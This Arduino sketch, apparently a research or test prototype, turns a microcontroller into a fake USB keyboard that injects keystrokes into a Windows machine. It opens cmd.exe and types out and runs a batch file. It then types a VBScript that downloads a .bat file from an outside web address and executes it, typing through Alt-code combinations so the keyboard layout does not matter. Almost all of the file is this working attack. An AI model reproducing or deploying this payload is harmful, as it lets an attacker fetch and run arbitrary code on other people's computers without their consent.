/* There were corrupted keys when testing with VirtualBox on Linux.
 * These were resolved with unloading and renaming usbhid module and
 * then enabling device in VirtualBox guest directly. */

#include "UsbKeyboard.h"

/* could be "start", "cscript" */
#define PROGRAM1 ""
#define PROGRAM2 "cscript"
#define URLPROGRAM ""
/* file to be run */
#define FILENAME1 "%TEMP%\\script.bat"
#define SCRIPT1 "echo TEST\r"
#define FILENAME2 "script.vbs"
#define URL "http://orwell.fiit.stuba.sk/~as/usb.bat"
#define URLSCRIPT "urlscript.bat"
#define SCRIPT2								\
	"strU = \"" URL "\"\r"						\
	"strF = \"" URLSCRIPT "\"\r"					\
	"Set objX = CreateObject(\"MSXML2.XMLHTTP\")\r"			\
	"objX.open \"GET\", strU, false\r"				\
	"objX.send()\r"							\
	"If objX.Status=200 Then\r"					\
	"Set objA=CreateObject(\"ADODB.Stream\")\r"			\
	"objA.Open\r"							\
	"objA.Type=1\r"							\
	"objA.Write objX.ResponseBody\r"				\
	"objA.Position=0\r"						\
	"Set objF=Createobject(\"Scripting.FileSystemObject\")\r"	\
	"If objF.Fileexists(strF) Then objF.DeleteFile strF\r"		\
	"Set objF = Nothing\r"						\
	"objA.SaveToFile strF\r"					\
	"objA.Close\r"							\
	"End if\r"							\

/* how much we wait on system actions [ms] */
#define WAIT 1000
/* how much we wait after connect */
#define WAIT_CONNECT 5000

/* Arduino "L" LED */
int ledPin = 13;

int i = 0;

void setup()
{
	pinMode(ledPin, OUTPUT);
	digitalWrite(ledPin, LOW);

	/* Disable timer0 since it can mess with the USB timing. Note that
	 * this means some functions such as delay() will no longer work. */
	TIMSK0 &= !(1<<TOIE0);

	/* disallow interrupts for usb connection */
	cli();

	/* Force re-enumeration so the host will detect us */
	usbDeviceDisconnect();
	delayMs(250);
	usbDeviceConnect();

	/* allow interrupts */
	sei();

	while (!usbInterruptIsReady())
		/* maximum delay is <50ms for accepting Setup message
		 * we do busy-waiting */
		UsbKeyboard.update();

	/* if we don't wait we lose 2-4 keys at the beginning (driver delay?) */
	delayMs(WAIT_CONNECT);
	digitalWrite(ledPin, HIGH);
}

void loop()
{
	UsbKeyboard.update();

	/* run cmd.exe */
	word cmd_run[] = { KEY_R, MOD_GUI_LEFT,
			   0, WAIT, };
	sendkeys(cmd_run, sizeof(cmd_run)/sizeof(word));
	send("cmd");
	UsbKeyboard.sendKeyStroke(KEY_ENTER);
	delayMs(WAIT);

	/* create script */
	send("copy /Y con " FILENAME1 "\r"
	     SCRIPT1);
	UsbKeyboard.sendKeyStroke(KEY_Z, MOD_CONTROL_LEFT);

	/* run script */
	send("\r"		/* confirm ^Z */
	     PROGRAM1 " " FILENAME1 "\r");

	/* create script */
	send("copy /Y con " FILENAME2 "\r"
	     SCRIPT2);
	UsbKeyboard.sendKeyStroke(KEY_Z, MOD_CONTROL_LEFT);

	/* run script */
	send("\r"		/* confirm ^Z */
	     PROGRAM2 " " FILENAME2 "\r");
	/* run downloaded script */
	send(URLPROGRAM " " URLSCRIPT "\r");

	/* don't loop - it's not desirable for test device */
	for (;;) {
		digitalWrite(ledPin, !digitalRead(ledPin));
		delayMs(500);
	}
}


/**
 * Define our own delay function so that we don't have to rely on
 * operation of timer0, the interrupt used by the internal delay()
 */
void delayMs(unsigned int ms)
{
	for (int i = 0; i < ms; i++) {
		delayMicroseconds(1000);
	}
}

uchar reportBuffer[4];
uchar num[10] = { 98, 89, 90, 91, 92, 93, 94, 95, 96, 97 };

void send1(uchar code1)
{
	reportBuffer[1] = code1;

	usbSetInterrupt(reportBuffer, sizeof(reportBuffer));

	while (!usbInterruptIsReady())
		;
}

void send2(uchar code1, uchar code2)
{
	reportBuffer[1] = code1;
	reportBuffer[2] = code2;

	usbSetInterrupt(reportBuffer, sizeof(reportBuffer));

	while (!usbInterruptIsReady())
		;
}

void send3(uchar code1, uchar code2, uchar code3)
{
	reportBuffer[1] = code1;
	reportBuffer[2] = code2;
	reportBuffer[3] = code3;

	usbSetInterrupt(reportBuffer, sizeof(reportBuffer));

	while (!usbInterruptIsReady())
		;
}

void send0()
{
	reportBuffer[1] = 0;
	reportBuffer[2] = 0;

	usbSetInterrupt(reportBuffer, sizeof(reportBuffer));

	while (!usbInterruptIsReady())
		;
}

/* Send Alt+ASCII decimal combo */
void sendascii(uchar ascii)
{
	while (!usbInterruptIsReady()) {
		// Note: We wait until we can send keystroke
		//       so we know the previous keystroke was
		//       sent.
	}

	memset(reportBuffer, 0, sizeof(reportBuffer));
	reportBuffer[0] = MOD_ALT_LEFT;

	// hundreds
	uchar a = ascii / 100;
	// tens
	uchar b = (ascii / 10) % 10;
	// ones
	uchar c = ascii % 10;

	/* do optimized number of reports for combo */
	if (a != 0) {
		if (a != b && b != c && a != c) {
			// abc => abc
			send3(num[a], num[b], num[c]);
		} else if (a == b && b != c) {
			// aac => a 0 ac
			send1(num[a]);
			send0();
			send2(num[b], num[c]);
		} else if (a == b && b == c) {
			// aaa => a 0 a 0 a
			send1(num[a]);
			send0();
			send1(num[b]);
			send0();
			send1(num[c]);
		} else if (a == c || b == c) {
			// aba => ab 0 a
			// abb => ab 0 b
			send2(num[a], num[b]);
			send0();
			send1(num[c]);
		}
	} else {
		if (b != c) {
			// bc => bc
			send2(num[b], num[c]);
		} else {
			// cc => c 0 c
			send1(num[b]);
			send0();
			send1(num[c]);
		}
	}

	// end combo
	memset(reportBuffer, 0, sizeof(reportBuffer));
	usbSetInterrupt(reportBuffer, sizeof(reportBuffer));
}

/* type text using ASCII combos (keyboard layout indifferent) */
void send(char *text)
{
	for (; *text != '\0'; text++) {
		sendascii(*text);
	}
}


/* send keypresses or delay {MOD0, KEY0, MOD1, KEY1, 0, DELAY, ...} */
void sendkeys(word *keys, int size)
{
	for (int i=0; i<size; ) {
		UsbKeyboard.update();

		if (usbInterruptIsReady()) {
			if (keys[i] != 0) {
				UsbKeyboard.sendKeyStroke(keys[i], keys[i+1]);
			} else {
				delayMs(keys[i+1]);
			}
			i += 2;
		}
	}
}
